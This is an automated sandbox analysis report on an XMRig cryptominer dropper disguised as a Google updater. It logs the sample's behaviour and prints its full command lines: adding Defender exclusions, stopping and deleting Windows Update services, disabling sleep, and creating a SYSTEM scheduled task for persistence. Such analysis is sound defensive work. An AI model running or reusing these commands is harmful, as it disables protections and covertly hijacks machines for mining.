xmrig | 78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

Analysis

max time kernel
150s
max time network
149s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
03-08-2023 18:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dmi1dfg7n.exe
Size

2.8MB
MD5

9253ed091d81e076a3037e12af3dc871
SHA1

ec02829a25b3bf57ad061bbe54180d0c99c76981
SHA256

78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
SHA512

29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
SSDEEP

49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6

Score

10^/10

xmrig evasion miner persistence upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 2020 created 420 2020 powershell.EXE winlogon.exe
PID 1712 created 420 1712 powershell.EXE winlogon.exe
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

description	pid	process	target process
PID 2020 created 420	2020	powershell.EXE	winlogon.exe
PID 1712 created 420	1712	powershell.EXE	winlogon.exe

XMRig Miner payload 8 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1684-221-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1684-224-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1684-226-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1684-228-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1684-230-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1684-232-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1684-234-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1684-236-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

services.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Program Files\\Google\\Libs\\WR64.sys"	services.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

1192 updater.exe
Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

1316 taskeng.exe

pid	process
1192	updater.exe

pid	process
1316	taskeng.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1684-221-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1684-224-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1684-226-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1684-228-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1684-230-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1684-232-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1684-234-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1684-236-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Drops file in System32 directory 4 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

dmi1dfg7n.exepowershell.EXEpowershell.EXEupdater.exe

description	pid	process	target process
PID 948 set thread context of 2932	948	dmi1dfg7n.exe	dialer.exe
PID 2020 set thread context of 2368	2020	powershell.EXE	dllhost.exe
PID 1712 set thread context of 1560	1712	powershell.EXE	dllhost.exe
PID 1192 set thread context of 2612	1192	updater.exe	dialer.exe
PID 1192 set thread context of 1684	1192	updater.exe	dialer.exe

Drops file in Program Files directory 4 IoCs

Processes:

dmi1dfg7n.exeupdater.execmd.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	dmi1dfg7n.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Drops file in Windows directory 4 IoCs

Processes:

dialer.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc32.job	dialer.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

3012 sc.exe
1768 sc.exe
1596 sc.exe
2104 sc.exe
2840 sc.exe
2888 sc.exe
3000 sc.exe
2756 sc.exe
2320 sc.exe
1748 sc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2420 schtasks.exe
2896 schtasks.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

1952 WMIC.exe

pid	process
3012	sc.exe
1768	sc.exe
1596	sc.exe
2104	sc.exe
2840	sc.exe
2888	sc.exe
3000	sc.exe
2756	sc.exe
2320	sc.exe
1748	sc.exe

pid	process
2420	schtasks.exe
2896	schtasks.exe

pid	process
1952	WMIC.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

powershell.EXEWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00481d1935c6d901	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEdllhost.exepowershell.exedllhost.exepowershell.exe

pid	process
1944	powershell.exe
2080	powershell.exe
2736	powershell.exe
2020	powershell.EXE
1712	powershell.EXE
2020	powershell.EXE
2368	dllhost.exe
2368	dllhost.exe
2368	dllhost.exe
2368	dllhost.exe
1876	powershell.exe
1712	powershell.EXE
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
2404	powershell.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe
1560	dllhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

services.exe

pid process

468 services.exe

pid	process
468	services.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

Processes:

powershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowershell.EXEpowershell.EXEdllhost.exepowershell.exedllhost.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeupdater.exeWMIC.exedialer.exeservices.exe

description	pid	process
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeShutdownPrivilege	2948	powercfg.exe
Token: SeShutdownPrivilege	2224	powercfg.exe
Token: SeShutdownPrivilege	1684	powercfg.exe
Token: SeShutdownPrivilege	3044	powercfg.exe
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	2020	powershell.EXE
Token: SeDebugPrivilege	1712	powershell.EXE
Token: SeDebugPrivilege	2020	powershell.EXE
Token: SeDebugPrivilege	2368	dllhost.exe
Token: SeDebugPrivilege	1876	powershell.exe
Token: SeDebugPrivilege	1712	powershell.EXE
Token: SeDebugPrivilege	1560	dllhost.exe
Token: SeDebugPrivilege	2404	powershell.exe
Token: SeShutdownPrivilege	2288	powercfg.exe
Token: SeShutdownPrivilege	872	powercfg.exe
Token: SeShutdownPrivilege	1328	powercfg.exe
Token: SeShutdownPrivilege	1580	powercfg.exe
Token: SeDebugPrivilege	1192	updater.exe
Token: SeAssignPrimaryTokenPrivilege	1952	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1952	WMIC.exe
Token: SeSecurityPrivilege	1952	WMIC.exe
Token: SeTakeOwnershipPrivilege	1952	WMIC.exe
Token: SeLoadDriverPrivilege	1952	WMIC.exe
Token: SeSystemtimePrivilege	1952	WMIC.exe
Token: SeBackupPrivilege	1952	WMIC.exe
Token: SeRestorePrivilege	1952	WMIC.exe
Token: SeShutdownPrivilege	1952	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1952	WMIC.exe
Token: SeUndockPrivilege	1952	WMIC.exe
Token: SeManageVolumePrivilege	1952	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1952	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1952	WMIC.exe
Token: SeSecurityPrivilege	1952	WMIC.exe
Token: SeTakeOwnershipPrivilege	1952	WMIC.exe
Token: SeLoadDriverPrivilege	1952	WMIC.exe
Token: SeSystemtimePrivilege	1952	WMIC.exe
Token: SeBackupPrivilege	1952	WMIC.exe
Token: SeRestorePrivilege	1952	WMIC.exe
Token: SeShutdownPrivilege	1952	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1952	WMIC.exe
Token: SeUndockPrivilege	1952	WMIC.exe
Token: SeManageVolumePrivilege	1952	WMIC.exe
Token: SeLockMemoryPrivilege	1684	dialer.exe
Token: SeLoadDriverPrivilege	468	services.exe
Token: SeBackupPrivilege	468	services.exe
Token: SeRestorePrivilege	468	services.exe
Token: SeSecurityPrivilege	468	services.exe
Token: SeTakeOwnershipPrivilege	468	services.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

dmi1dfg7n.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 948 wrote to memory of 1944	948	dmi1dfg7n.exe	powershell.exe
PID 948 wrote to memory of 1944	948	dmi1dfg7n.exe	powershell.exe
PID 948 wrote to memory of 1944	948	dmi1dfg7n.exe	powershell.exe
PID 948 wrote to memory of 2540	948	dmi1dfg7n.exe	cmd.exe
PID 948 wrote to memory of 2540	948	dmi1dfg7n.exe	cmd.exe
PID 948 wrote to memory of 2540	948	dmi1dfg7n.exe	cmd.exe
PID 948 wrote to memory of 1212	948	dmi1dfg7n.exe	cmd.exe
PID 948 wrote to memory of 1212	948	dmi1dfg7n.exe	cmd.exe
PID 948 wrote to memory of 1212	948	dmi1dfg7n.exe	cmd.exe
PID 948 wrote to memory of 2080	948	dmi1dfg7n.exe	powershell.exe
PID 948 wrote to memory of 2080	948	dmi1dfg7n.exe	powershell.exe
PID 948 wrote to memory of 2080	948	dmi1dfg7n.exe	powershell.exe
PID 2540 wrote to memory of 2840	2540	cmd.exe	sc.exe
PID 2540 wrote to memory of 2840	2540	cmd.exe	sc.exe
PID 2540 wrote to memory of 2840	2540	cmd.exe	sc.exe
PID 1212 wrote to memory of 2948	1212	cmd.exe	powercfg.exe
PID 1212 wrote to memory of 2948	1212	cmd.exe	powercfg.exe
PID 1212 wrote to memory of 2948	1212	cmd.exe	powercfg.exe
PID 2540 wrote to memory of 2888	2540	cmd.exe	sc.exe
PID 2540 wrote to memory of 2888	2540	cmd.exe	sc.exe
PID 2540 wrote to memory of 2888	2540	cmd.exe	sc.exe
PID 1212 wrote to memory of 2224	1212	cmd.exe	powercfg.exe
PID 1212 wrote to memory of 2224	1212	cmd.exe	powercfg.exe
PID 1212 wrote to memory of 2224	1212	cmd.exe	powercfg.exe
PID 2540 wrote to memory of 3000	2540	cmd.exe	sc.exe
PID 2540 wrote to memory of 3000	2540	cmd.exe	sc.exe
PID 2540 wrote to memory of 3000	2540	cmd.exe	sc.exe
PID 1212 wrote to memory of 1684	1212	cmd.exe	powercfg.exe
PID 1212 wrote to memory of 1684	1212	cmd.exe	powercfg.exe
PID 1212 wrote to memory of 1684	1212	cmd.exe	powercfg.exe
PID 1212 wrote to memory of 3044	1212	cmd.exe	powercfg.exe
PID 1212 wrote to memory of 3044	1212	cmd.exe	powercfg.exe
PID 1212 wrote to memory of 3044	1212	cmd.exe	powercfg.exe
PID 2080 wrote to memory of 2896	2080	powershell.exe	schtasks.exe
PID 2080 wrote to memory of 2896	2080	powershell.exe	schtasks.exe
PID 2080 wrote to memory of 2896	2080	powershell.exe	schtasks.exe
PID 2540 wrote to memory of 3012	2540	cmd.exe	sc.exe
PID 2540 wrote to memory of 3012	2540	cmd.exe	sc.exe
PID 2540 wrote to memory of 3012	2540	cmd.exe	sc.exe
PID 2540 wrote to memory of 2756	2540	cmd.exe	sc.exe
PID 2540 wrote to memory of 2756	2540	cmd.exe	sc.exe
PID 2540 wrote to memory of 2756	2540	cmd.exe	sc.exe
PID 2540 wrote to memory of 1300	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 1300	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 1300	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 2904	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 2904	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 2904	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 1500	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 1500	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 1500	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 560	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 560	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 560	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 1504	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 1504	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 1504	2540	cmd.exe	reg.exe
PID 948 wrote to memory of 2932	948	dmi1dfg7n.exe	dialer.exe
PID 948 wrote to memory of 2932	948	dmi1dfg7n.exe	dialer.exe
PID 948 wrote to memory of 2932	948	dmi1dfg7n.exe	dialer.exe
PID 948 wrote to memory of 2932	948	dmi1dfg7n.exe	dialer.exe
PID 948 wrote to memory of 2736	948	dmi1dfg7n.exe	powershell.exe
PID 948 wrote to memory of 2736	948	dmi1dfg7n.exe	powershell.exe
PID 948 wrote to memory of 2736	948	dmi1dfg7n.exe	powershell.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:476

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:468

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f05f9aaf-ee9d-47e2-ac6e-8860bcf20eb6}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{f8e4e3ed-fc97-4e2e-a9ee-d10cad5fe984}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560

C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe
"C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"
1⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2540

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:2840

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:2888

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:3000

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:3012

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:2756

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1300

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:2904

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:1500

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:560

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1504

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1212

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2224

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3044

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2080

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
3⤵
- Creates scheduled task(s)
PID:2896

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
2⤵
- Drops file in Windows directory
PID:2932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2736

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:856

C:\Windows\system32\taskeng.exe
taskeng.exe {274F7C26-51D0-46DB-8A1A-28C052F77BF4} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:1316

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1876

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:2912

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:1768

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:2320

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1748

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:2104

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1596

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
4⤵
PID:2632

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
4⤵
PID:304

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
4⤵
PID:2620

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
4⤵
PID:2664

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
PID:2464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2404

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
4⤵
- Creates scheduled task(s)
PID:2420

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
PID:2132

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2288

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:872

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1328

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe xtrjicqmdliu
3⤵
PID:2612

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
4⤵
- Drops file in Program Files directory
PID:1816

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
3⤵
- Drops file in Program Files directory
PID:2676

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
